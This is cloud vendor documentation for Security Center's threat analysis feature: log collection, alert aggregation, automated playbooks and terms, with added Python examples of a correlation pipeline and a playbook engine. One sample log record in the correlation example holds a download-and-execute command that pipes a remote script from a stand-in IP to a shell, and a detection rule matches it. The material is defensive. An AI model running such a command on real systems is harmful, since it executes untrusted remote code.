
Security Center: Overview

Last Updated: Mar 08, 2024

In an increasingly complex network security environment, organizations face the challenge of effectively monitoring and managing large volumes of alerts and logs from distributed systems. Security Center addresses this challenge with the threat analysis feature, which centrally manages the alerts and logs of multiple cloud services across accounts in a multi-cloud environment. The feature helps you improve O&M efficiency and respond to potential risks.

Background information

How it works

The threat analysis feature provides a cloud-native security information and event management (SIEM) solution. The feature provides capabilities such as log collection, alert generation, event aggregation and analysis, and event response and orchestration.

The feature collects logs from the accounts and cloud services of multiple cloud service providers, then analyzes the collected logs against predefined and custom detection rules to identify attacks, reconstruct complete attack chains, and generate security events with detailed context. When a threat is detected, the feature triggers Security Orchestration, Automation, and Response (SOAR), which handles the threat source in collaboration with related Alibaba Cloud services, for example by blocking or quarantining it. This shortens the time needed to handle a security event.


Benefits

  • Standardized data collection

The feature collects various logs, such as alert logs, network logs, system logs, and application logs, across services, accounts, and cloud platforms. The collected data is normalized into a common format and enriched with context.

  • Multi-dimension threat detection

The feature strengthens the single-point detection of individual security products, such as WAF and Cloud Firewall, by using threat detection methods such as multi-source data association analysis, AI graph computing and inference, and threat intelligence that is updated in real time. The feature provides more than 40 threat detection scenarios and 3 types of event analysis models.

  • Efficient event investigation

The feature aggregates related alerts into security events and automatically reconstructs the attack timeline and path. Alibaba Cloud states that the rate at which alerts trigger erroneous security events is only 0.0001%. This enriches the investigation context and speeds up alert triage and event handling.

  • Automated response and orchestration

The feature automatically handles malicious entities, such as malicious IP addresses, files, and processes, based on automatic response rules and playbooks, in collaboration with multiple services. This makes emergency response streamlined, standardized, and automated.
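The pipeline described above (normalize logs from several sources, run detection rules over them, aggregate related alerts into one security event, and reconstruct its timeline) is illustrated by the following added Python example. It is not Security Center code and does not use its API; the log records, field names, rule names, severities and the 30-minute correlation window are constructed assumptions.

```python
"""Added example (not Security Center code): normalize log records from three
sources, run detection rules over them, and aggregate the resulting alerts into
one security event keyed on shared entities (IP addresses), with a timeline.
All records, field names, rule names and the correlation window are assumptions."""
import re
from datetime import datetime, timedelta

# Constructed sample records in the shape three different services might emit.
WAF_ALERTS = [
    {"ts": "2024-03-01T10:00:05Z", "src": "203.0.113.7", "host": "shop.example", "rule": "sqli"},
]
CFW_FLOWS = [
    {"ts": "2024-03-01T10:00:20Z", "src_ip": "203.0.113.7", "dst_ip": "10.0.0.12",
     "dst_port": 22, "action": "accept"},
]
HOST_PROCS = [
    {"ts": "2024-03-01T10:01:02Z", "ip": "10.0.0.12", "user": "www",
     "cmd": "curl http://203.0.113.7/x.sh | sh"},
    {"ts": "2024-03-01T10:05:00Z", "ip": "10.0.0.12", "user": "ops",
     "cmd": "ls -la /var/log"},  # benign noise: reaches the pipeline, raises no alert
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SEV_RANK = {"low": 1, "medium": 2, "high": 3}

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")

def normalize(source, rec):
    """Map each source's own field names onto one common schema."""
    if source == "waf":
        return {"ts": rec["ts"], "source": source, "src_ip": rec["src"],
                "dst": rec["host"], "detail": rec["rule"]}
    if source == "cfw":
        return {"ts": rec["ts"], "source": source, "src_ip": rec["src_ip"],
                "dst": f"{rec['dst_ip']}:{rec['dst_port']}", "detail": rec["action"]}
    if source == "host":
        return {"ts": rec["ts"], "source": source, "src_ip": None,
                "dst": rec["ip"], "detail": rec["cmd"]}
    raise ValueError(f"unknown source {source}")

# Detection rules: (name, severity, predicate over a normalized record).
RULES = [
    ("waf_sqli", "medium",
     lambda r: r["source"] == "waf" and r["detail"] == "sqli"),
    ("ssh_accepted_from_internet", "low",
     lambda r: r["source"] == "cfw" and r["dst"].endswith(":22") and r["detail"] == "accept"),
    ("download_and_execute", "high",
     lambda r: r["source"] == "host" and "http" in r["detail"] and "| sh" in r["detail"]),
]

def detect(records):
    """Emit one alert per (record, matching rule); non-matching records are dropped."""
    return [{**r, "rule": name, "severity": sev}
            for r in records for name, sev, pred in RULES if pred(r)]

def entities(alert):
    """IP addresses the alert is about: the source IP plus any IP in target or detail."""
    found = {alert["src_ip"]} if alert["src_ip"] else set()
    found.update(IP_RE.findall(alert["dst"]))
    found.update(IP_RE.findall(alert["detail"]))
    return found

def aggregate(alerts, window=timedelta(minutes=30)):
    """Join alerts that share an entity and fall within `window` of the event's
    last alert into one event; event severity is the highest of its alerts."""
    events = []
    for a in sorted(alerts, key=lambda x: parse_ts(x["ts"])):
        ents, ts = entities(a), parse_ts(a["ts"])
        for ev in events:
            if ev["entities"] & ents and ts - ev["last_ts"] <= window:
                ev["alerts"].append(a)
                ev["entities"] |= ents
                ev["last_ts"] = ts
                break
        else:
            events.append({"entities": set(ents), "alerts": [a], "last_ts": ts})
    for ev in events:
        ev["severity"] = max((a["severity"] for a in ev["alerts"]), key=SEV_RANK.__getitem__)
        ev["timeline"] = [(a["ts"], a["source"], a["rule"]) for a in ev["alerts"]]
    return events

def run():
    records = ([normalize("waf", r) for r in WAF_ALERTS]
               + [normalize("cfw", r) for r in CFW_FLOWS]
               + [normalize("host", r) for r in HOST_PROCS])
    return aggregate(detect(records))

if __name__ == "__main__":
    for ev in run():
        print(ev["severity"], sorted(ev["entities"]))
        for step in ev["timeline"]:
            print("  ", *step)
```

The three alerts are linked only because the host-side command line contains the same external IP that WAF and Cloud Firewall saw, so the correlation key (any shared IP within the window) is what turns three single-product alerts into one event with an ordered timeline. In a real multi-account deployment the normalized record would also carry the account and provider the log came from, and the entity extraction would need to distinguish private address ranges reused across accounts.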

Supported cloud services and log types

The threat analysis feature supports more than 20 cloud services and more than 50 log types. The following list describes the supported cloud services and log types, grouped by cloud service provider.

Alibaba Cloud

  • Security Center

      • Alert logs, configuration assessment logs, vulnerability logs, and baseline logs of Security Center

      • Logon logs, network connection logs, process startup logs, file read and write logs, failed host logon logs, and failed MySQL and FTP logon logs

      • Account snapshot logs, network snapshot logs, process snapshot logs, and port snapshot logs

      • Internet HTTP logs, Internet session logs, Internet Domain Name System (DNS) logs, and DNS logs

  • Web Application Firewall (WAF): alert logs and flow logs of WAF, and flow logs of WAF 3.0

  • Cloud Firewall: alert logs and flow logs of Cloud Firewall

  • Anti-DDoS: flow logs of Anti-DDoS Proxy (Chinese Mainland), flow logs of Anti-DDoS Proxy, and logs of Anti-DDoS Origin

  • Bastionhost: Bastionhost logs

  • CDN: flow logs of Alibaba Cloud CDN (CDN) and flow logs of CDN WAF

  • API Gateway: API Gateway logs

  • Container Service for Kubernetes (ACK): audit logs of Kubernetes resources

  • PolarDB: audit logs of PolarDB-X 1.0 and PolarDB-X 2.0

  • ApsaraDB for MongoDB: run logs and audit logs of ApsaraDB for MongoDB

  • ApsaraDB RDS: audit logs of ApsaraDB RDS

  • Virtual Private Cloud (VPC): flow logs of VPC

  • Elastic IP Address (EIP): flow logs of EIP

  • Server Load Balancer (SLB): Layer 7 logs of Classic Load Balancer (CLB) and flow logs of Application Load Balancer (ALB)

  • Object Storage Service (OSS): batch deletion logs, metering logs, and flow logs of OSS

  • Apsara File Storage NAS: operation logs of NAS NFS

  • Function Compute (FC): operation logs of Function Compute

  • ActionTrail: ActionTrail logs

  • Cloud Config: Cloud Config logs

Tencent Cloud

  • WAF: alert logs of WAF

  • Cloud Firewall: alert logs of Cloud Firewall

Huawei Cloud

  • WAF: alert logs of WAF

  • Cloud Firewall: alert logs of Cloud Firewall

Scenarios

The threat analysis feature provides a cloud-native security information and event management platform with multiple capabilities. The feature helps enterprises efficiently manage and respond to security threats and simplifies security O&M. The feature is suitable for the following scenarios:

  • Centralized collection and audit of data across cloud environments, accounts, and services

    The threat analysis feature collects log data across cloud environments, accounts, and services in a centralized manner. This way, you can view and audit the collected data in the Security Center console by using a management account. The feature helps you monitor security events across cloud platforms and simplifies data analysis and security audit.

  • Centralized threat operations and monitoring

The threat analysis feature provides a global view for monitoring and analysis, so that you can monitor and manage the threats of multiple services in the Security Center console. This helps enterprises identify and respond to security events at the earliest opportunity.

  • Global risk analysis and alert denoising

The threat analysis feature reduces the quantity and frequency of alerts by aggregating and filtering alert data, and optimizes the processing of log data. This way, your security team can focus on high-priority threats, and alert overload and false positives are reduced.

  • Automated response and handling of security events

    The threat analysis feature provides automated response and handling capabilities to help your security team handle the detected threats at the earliest opportunity. For example, the security team can block malicious sources and quarantine affected resources. The feature helps improve the efficiency of response to security events and overall security.

Purchase and enable the threat analysis feature

  1. Go to the Security Center buy page.

  2. Set the Threat Analysis parameter to Yes and configure the Log Storage Capacity of Threat Analysis parameter.


  3. Log on to the Security Center console. In the top navigation bar, select the region in which your asset resides. You can select China or Outside China.

  4. In the left-side navigation pane, choose Detection and Response > Threat Analysis and Response.

  5. On the Threat Analysis and Response page, click Authorize Now.

    After the authorization, Security Center automatically creates a service-linked role named AliyunServiceRoleForSasCloudSiem. The threat analysis feature assumes this role to access the resources of your cloud services, so the role is what grants the feature its cross-service access; keep it in place for as long as the feature is enabled. For more information about the service-linked role, see Service-linked roles for Security Center.

Changes in the Security Center console after threat analysis is enabled

After you enable the threat analysis feature, the layout of some modules in the Security Center console is changed.

Detection and Response

  The Detection and Response module in the left-side navigation pane is renamed Threat Analysis and Response. Pages such as Security Event Handling and Log Search are added to the Threat Analysis and Response module. In addition, the following pages are changed:

  • Alert Handling: This page is renamed Alerts, which displays information about the global alerts of threat analysis.

    In the upper-right corner of the Alerts page, you can click Alerts on Host and Container to go to the Alert Handling page.

  • Attack Awareness: The entry point to the Attack Awareness page is no longer provided in the left-side navigation pane after threat analysis is enabled.

    In the upper-right corner of the Alerts page, you can click View Attack Analysis Results Within Current Account to go to the Attack Awareness page. For more information, see Attack awareness.

  • Investigation: The entry point to the Investigation page is no longer provided in the left-side navigation pane after threat analysis is enabled.

    In the upper-right corner of the Alerts page, you can click Alerts on Host and Container. On the Alert Handling page, you can click the investigation icon in the Alert Name column to go to the Investigation page. For more information, see View and handle security alerts.

System Configuration > Multi-account Control

  The Account Monitored by Threat Analysis tab is added. On this tab, you can add Alibaba Cloud accounts to the threat analysis feature.

Terms

Before you use the threat analysis feature, you must understand the terms that are related to the feature. The following list describes the terms.

  • handling policy: A handling policy describes the details of scenario-specific alert handling. A handling policy is generated based on the handling result of an entity in a scenario.

  • handling task: A handling task describes the details of scope-specific alert handling. The event handling process of an entity in a scenario is divided into multiple handling tasks based on scopes.

  • entity: An entity is the core object of an alert, which can be an IP address, a file, or a process.

  • SOAR: Security Orchestration, Automation, and Response (SOAR) is a solution that provides automated tools and procedures to organize and manage event response measures. SOAR helps enterprises respond to security events efficiently, reduces manual intervention, and improves the handling efficiency of events.

  • playbook: A playbook provided by SOAR is an automated security management process that consists of predefined response policies. A playbook is executed automatically after specific events are triggered.

    You create a playbook in the same manner as you draw a flowchart. A playbook contains start, judgment, action, and end nodes. You define actions for each component on a canvas in a visualized manner. For example, you can define the network disabling action for the terminal management component.

  • component: A component is used to connect to an external system or service, such as WAF, Cloud Firewall, a database service, or a notification service. As a connector, a component does not process complex logic; complex logic is processed by the connected external system or service. After you select a component, you must select resource instances and actions for the component.

    Components are classified into process orchestration components, basic orchestration components, and security application components.

  • resource instance: A resource instance specifies the external service to which a component is connected. For example, if you want to use a MySQL component and your enterprise has multiple MySQL databases, you must specify the database to which you want to connect the MySQL component.

  • action: An action specifies an execution capability of a component. A component can have multiple actions. For example, the terminal management component supports actions such as disabling accounts, isolating networks, and sending notifications.
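The playbook, component, resource instance and action terms above describe one model: a flowchart of start, judgment, action and end nodes in which every action node invokes one action of a component bound to a named resource instance. The following added Python example shows that model as a small executable graph. It is not the product's own orchestration engine or API; the component names, instance names, action names and the step limit are assumptions, and the actions return strings where real ones would call the corresponding service.

```python
"""Added example of the playbook model in the Terms list (not the product's
own orchestration engine or API): a playbook is a graph of start, judgment,
action and end nodes; an action node invokes one action of a component that is
bound to a named resource instance. Component, instance and action names are
assumptions; real actions would call the corresponding service API."""

class Component:
    """Connector to an external system; holds no logic beyond dispatching actions."""
    def __init__(self, name, instance, actions):
        self.name = name            # component type, e.g. "cloud_firewall"
        self.instance = instance    # the resource instance this component is bound to
        self.actions = actions      # action name -> callable(instance, entity)
        self.calls = []             # audit trail of executed actions

    def run(self, action, entity):
        if action not in self.actions:
            raise KeyError(f"component {self.name} has no action {action!r}")
        self.calls.append((self.instance, action, entity["value"]))
        return self.actions[action](self.instance, entity)

# Hypothetical actions; each returns a short result string instead of calling a service.
def block_ip(instance, entity):
    return f"blocked {entity['value']} on {instance}"

def isolate_network(instance, entity):
    return f"isolated {entity['value']} via {instance}"

def send_notification(instance, entity):
    return f"notified {instance} about {entity['type']} {entity['value']}"

COMPONENTS = {
    "cloud_firewall": Component("cloud_firewall", "cfw-instance-1", {"block_ip": block_ip}),
    "terminal_mgmt": Component("terminal_mgmt", "agent-group-prod",
                               {"isolate_network": isolate_network}),
    "notification": Component("notification", "soc-channel", {"send": send_notification}),
}

# The playbook as a flowchart: judgment nodes branch on the entity, action nodes
# name a component and one of its actions, and every path ends at "end".
PLAYBOOK = {
    "start":   {"type": "start", "next": "is_ip"},
    "is_ip":   {"type": "judgment", "cond": lambda e: e["type"] == "ip",
                "yes": "block", "no": "is_host"},
    "block":   {"type": "action", "component": "cloud_firewall", "action": "block_ip",
                "next": "notify"},
    "is_host": {"type": "judgment", "cond": lambda e: e["type"] == "host",
                "yes": "isolate", "no": "notify"},
    "isolate": {"type": "action", "component": "terminal_mgmt", "action": "isolate_network",
                "next": "notify"},
    "notify":  {"type": "action", "component": "notification", "action": "send",
                "next": "end"},
    "end":     {"type": "end"},
}

def run_playbook(playbook, components, entity, max_steps=50):
    """Walk the graph from "start" until an end node; return the action results in
    execution order. `max_steps` stops a malformed playbook from looping forever."""
    results, node_id = [], "start"
    for _ in range(max_steps):
        node = playbook[node_id]
        kind = node["type"]
        if kind == "end":
            return results
        if kind == "start":
            node_id = node["next"]
        elif kind == "judgment":
            node_id = node["yes"] if node["cond"](entity) else node["no"]
        elif kind == "action":
            results.append(components[node["component"]].run(node["action"], entity))
            node_id = node["next"]
        else:
            raise ValueError(f"unknown node type {kind!r} at node {node_id!r}")
    raise RuntimeError(f"playbook exceeded {max_steps} steps without reaching an end node")

if __name__ == "__main__":
    for entity in ({"type": "ip", "value": "203.0.113.7"},
                   {"type": "host", "value": "i-abc123"},
                   {"type": "file", "value": "malicious.sh"}):
        print(entity["type"], run_playbook(PLAYBOOK, COMPONENTS, entity))
```

Two details matter in practice: the component records every action it executes against its resource instance, which is the audit trail you want when an automated playbook blocks or isolates something, and the step limit makes a playbook whose judgment nodes loop back on themselves fail closed instead of running forever.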
